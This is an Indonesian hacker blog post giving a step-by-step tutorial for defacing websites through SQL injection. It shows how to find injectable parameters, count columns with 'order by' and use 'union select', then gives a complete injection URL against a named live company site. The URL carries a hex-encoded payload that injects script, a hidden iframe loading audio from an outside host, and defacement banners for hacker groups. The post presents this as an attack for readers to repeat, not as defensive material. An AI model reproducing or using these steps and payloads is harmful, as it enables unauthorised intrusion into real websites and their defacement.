Cara Poc Deface Solved SQL Print Nick + Image Live Target with DIOS| LXI - 2019

Assalamualaikum Wr.Wb.

{{{Whatsapp The_N4R4NT}}}

{{{Instagram The_N4R4NT}}}

Balik lagi bersama gw yekan :v admin yang paling gans diseluruh dunia The_N4R4NT.Oke pada kali ini saya akan kasih tutorial cara Proof SQL inj Print Nick + Image.Dan langsung saja gausah banyak bacot ya ajg :v
Bahan yang kalian butuhkan adalah :
1.Dork
2.Tool encrypt code sc kalian (Gambar + Nick)
3.Dios

Bahan Bahanya saya kasih disini semua

Untuk mengetahui vuln atau tidak nya beri tanda (') dibelakang angka (-) didepan angka
Ciri-ciri vuln nya nanti blank putih atau ada tulisan "you have an error with MySQL Syntax" / gambar hilang kira kira begitu
Catatan: (') akan berubah menjadi %27,
Jika ada kata "Invalid query: Unknown column '(angka)' in 'order clause'" maka angka ajaib ada di angka sebelum itu
Jika vuln langsung kita order saja cari angka ajaib, di target ini saya menemukan vuln dengan ('), cara ordernya "+order+by+1--+-" dibelakang nya
Contoh: http://site/readnews.php?id=4+order+by+1--+-
Lakukan order dengan mengganti angka di bagian "order+by+(ganti angkanya sampai ketemu vulnya)"
Lanjut Enter

Nah pada target kali ini vulnya ada di angka 6
Contoh http://site/readnews.php?id=4+order+by+6--+-

Seperti itu contoh Vulnerabilityny

•Nah jika sudah ketemu angka vulnnya lalu kita cari angka togel gel gelek nya :v dengan cara
"union+select+1,2,3,4,5.....sampai angka vulnnya-1"

•Contoh ini kan live targetnya vuln di angka sembilan jadi 6-1=5 and then kita union sampai 5
Contoh -> http://site/readnews.php?id=4+union+select+1,2,3,4,5--+- <-

•Nah di live target ini muncul angka 2,3,4

•Nah sekarang kita masukan Hex Encode tadi di angka ajaibnya dengan cara 
Masukan concat(0x angka hexnya tadi)
Contoh : http://www.kabelindo.co.id/readnews.php?id=4+union+select+1,concat(0x3c7363726970743e20616c6572742822496e6a6563746564204279205468655f4e3452344e5422293b3c2f7363726970743e3c696672616d652077696474683d223022206865696768743d223022207372633d2268747470733a2f2f682e746f7034746f702e696f2f6d5f31363239647273396a302e6d703322206672616d65626f726465723d22302220616c6c6f7766756c6c73637265656e20223122206c6f6f703e3c2f696672616d653e3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f474853637054342f32303230303631372d3233313831352e6a706722206865696768743d223430307078222077696474683d223430307078223e3c62723e57617320496e6a65637420416e642054616b656e20427920332042524f544845523c2f62723e3c63656e7465723e3c666f6e7420666163653d226d6f6e6f73706163652220636f6c6f723d22726564222073697a653d2233223e5468655f4e3452344e54202d204834564b5f443356314c35202d20446576696c6b754043433c2f666f6e743e3c68313e4c6f6c7a53656320582d506c6f697420496e646f3c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e496e646f6e657369616e2053656375726974793c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e4d616c616e672047726579204861743c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e536174616e696320446576696c204f6666696369616c3c2f68313e3c2f63656e7465723e),3,4,5--+-

Dan jadinya......

1 Tap again :v

And Dor :v

Okeh sekian saja materi dari saya admin gans,jikala saya mempunyai salah mohon maafkan dari perkataan yang kurang berkenan,kami sebagai :
-The_N4R4NT
-RebelSuck

Greetz
-LolzSec X-Ploit Indo Official
-Satanic Devil Official
-Malang Grey Hat
-Indonesian Security
-Bangkalan X-Ploit
-GC attacker diluar sana :v

Kami pamit undur diri,Wassalamualaikum Wr.Wb.

Jangan lupa Tinggalkan komen yaaa


Kontak Saya ada diatas sendiri!

3 Responses to "Cara Poc Deface Solved SQL Print Nick + Image Live Target with DIOS| LXI - 2019"

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel